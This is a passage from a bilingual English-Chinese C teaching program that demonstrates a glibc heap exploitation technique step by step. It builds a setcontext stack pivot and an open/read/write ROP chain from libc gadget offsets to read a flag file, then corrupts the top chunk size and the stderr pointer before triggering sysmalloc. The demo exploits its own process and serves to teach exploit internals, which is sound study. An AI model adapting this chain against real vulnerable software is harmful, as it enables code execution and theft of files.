puts("\033[32mNow, we are ready to write something in our bss segment.\033[0m"); puts("\033[32m现在我们准备写一些内容到bss段。\033[0m"); puts("\033[32mNoticing that the first instruction of pcop moves [rdi+0x8] to rdx, while rdi now is address of bss.\033[0m"); puts("\033[32m注意到pcop的第一条指令将[rdi+0x8]的值移动到rdx,而rdi此时的值是bss处的地址。\033[0m"); printf("\033[32mSo that we can write the address of somewhere in bss to [rdi+0x8](%p).\033[0m", &(space[1])); printf("\033[32m所以我们可以将任意地址写到[rdi+0x8](%p)这个bss段中的地址。.\033[0m", &(space[1])); space[1] = (size_t)space; printf("\033[32m[rdi+0x8] now is: \033[31m%#zx\033[32m.\n\033[0m", space[1]); printf("\033[32m[rdi+0x8]现在的值为: \033[31m%#zx\033[32m.\n\033[0m", space[1]);
puts("\033[32mThen we need to write address of setcontext into [rdx+0x20].\033[0m"); puts("\033[32m然后我们需要写setcontext函数的地址到[rdx+0x20]。\033[0m"); puts("\033[32mHave a look at disassembly result of function setcontext: \033[0m"); puts("\033[32m看一下setcontext函数的汇编: \033[0m"); puts("\033[34m.text:0000000000053A6D \033[1;31mmov rsp, [rdx+0A0h]\033[34m\n" ".text:0000000000053A74 mov rbx, [rdx+80h]\n" ".text:0000000000053A7B mov rbp, [rdx+78h]\n" ".text:0000000000053A7F mov r12, [rdx+48h]\n" ".text:0000000000053A83 mov r13, [rdx+50h]\n" ".text:0000000000053A87 mov r14, [rdx+58h]\n" ".text:0000000000053A8B mov r15, [rdx+60h]\n" ".text:0000000000053A8F test dword ptr fs:48h, 2\n" ".text:0000000000053A9B jz loc_53B56\n" "\t\t\t......\n" ".text:0000000000053B56 \033[1;31mmov rcx, [rdx+0A8h]\033[34m\n" ".text:0000000000053B5D \033[1;31mpush rcx\033[34m\n" ".text:0000000000053B5E mov rsi, [rdx+70h]\n" ".text:0000000000053B62 mov rdi, [rdx+68h]\n" ".text:0000000000053B66 mov rcx, [rdx+98h]\n" ".text:0000000000053B6D mov r8, [rdx+28h]\n" ".text:0000000000053B71 mov r9, [rdx+30h]\n" ".text:0000000000053B75 mov rdx, [rdx+88h]\n" ".text:0000000000053B75 ; } // starts at 53A30\n" ".text:0000000000053B7C ; __unwind {\n" ".text:0000000000053B7C xor eax, eax\n" ".text:0000000000053B7E retn\033[0m");
puts("\033[32mWe let [rdx+0xa0] = bss + 0x100, and let [rdx+0xa8] = some gadget address as the start of our ROP chain.\033[0m"); puts("\033[32m我们让[rdx+0xa0] = bss + 0x100, 让[rdx+0xa8] = 某些gadget的地址作为ROP链的开始。\033[0m"); puts("\033[32mThere are some useful gadgets: \033[0m"); puts("\033[32m这里是一些有用的gadget地址: \033[0m"); size_t poprdi_ret = libc_base + 0x2a3e5; size_t poprsi_ret = libc_base + 0x2be51; size_t poprdx_rbx_ret = libc_base + 0x90529; printf("\033[33mpop rdi ; ret : %#zx\n\033[0m", poprdi_ret); printf("\033[33mpop rsi ; ret : %#zx\n\033[0m", poprsi_ret); printf("\033[33mpop rdx ; pop rbx ; ret : %#zx\n\033[0m", poprdx_rbx_ret); puts("\033[32mHere are some key functions: \033[0m"); puts("\033[32m这里是一些关键函数的地址: \033[0m"); size_t readfunc_addr = (size_t)read; size_t writefunc_addr = (size_t)write; size_t openfunc_addr = (size_t)open; printf("\033[33mopen(): %#zx\n\033[0m", openfunc_addr); printf("\033[33mread(): %#zx\n\033[0m", readfunc_addr); printf("\033[33mwrite(): %#zx\n\033[0m", writefunc_addr);
space[0x20 / 8] = (size_t)(libc_base + 0x53a6d); space[0xa0 / 8] = (size_t)(&space[0x100 / 8]); space[0xa8 / 8] = poprdi_ret;
puts("\033[32mThen let's construct our ROP chain.\033[0m"); puts("\033[32m然后我们来构造ROP链。\033[0m"); space[0x100 / 8] = (size_t)flag; space[0x108 / 8] = poprsi_ret; space[0x110 / 8] = 0; space[0x118 / 8] = openfunc_addr; space[0x120 / 8] = poprdi_ret; space[0x128 / 8] = 3; space[0x130 / 8] = poprsi_ret; space[0x138 / 8] = (size_t)(&space[0xf0]); space[0x140 / 8] = poprdx_rbx_ret; space[0x148 / 8] = 0x40; space[0x150 / 8] = 0; space[0x158 / 8] = readfunc_addr; space[0x160 / 8] = poprdi_ret; space[0x168 / 8] = 1; space[0x170 / 8] = poprsi_ret; space[0x178 / 8] = (size_t)(&space[0xf0]); space[0x180 / 8] = poprdx_rbx_ret; space[0x188 / 8] = 0x40; space[0x190 / 8] = 0; space[0x198 / 8] = writefunc_addr;
puts("\033[32mHere is the former part of bss spare space:\033[0m"); puts("\033[32m下面是bss空闲区域前面的一部分:\033[0m"); for(int i=0; i<0x20; i++) printf("\033[1;34m+%#5x\t\t%#18zx\t\t%#18zx\n\033[0m", i * 0x10, space[2*i], space[2*i+1]);
}else{ puts("\033[31mError: invalid exploit mode!\033[0m"); puts("\033[31m错误:选择了无效的利用模式!\033[0m"); exit(1); }
puts("\033[032mThen, we need to \033[31mchange the size of top chunk to make it unaligned, and malloc a big space.\033[0m"); puts("\033[032m然后,我们需要\033[31m修改top chunk的大小来让它不对齐,然后malloc一块大空间。\033[0m"); *top_chunk_size = 0x101; printf("\033[32mThe value of top_chunk->size was changed into: %#zx\033[0m\n", *top_chunk_size); printf("\033[32m现在top_chunk->size的值被修改为: %#zx\033[0m\n", *top_chunk_size);
puts("\033[32mThen, change the value of stderr pointer.\033[0m"); puts("\033[32m然后,修改stderr指针的值。\033[0m"); printf("\033[32mBefore alteration: *stderr_pointer = \033[33m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr))); printf("\033[32m修改之前: *stderr_pointer = \033[33m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr))); *(size_t*)stderr_ptr = (size_t)fake_file_struct; printf("\033[32mAfter alteration: *stderr_pointer = \033[31m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr))); printf("\033[32m修改之后: *stderr_pointer = \033[31m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr)));
printf("\033[32mAnd the last step: malloc(0x200) to trigger sysmalloc.\n\033[0m"); printf("\033[32m然后是最后一步:malloc(0x200)触发sysmalloc。\n\033[0m"); malloc(0x200); }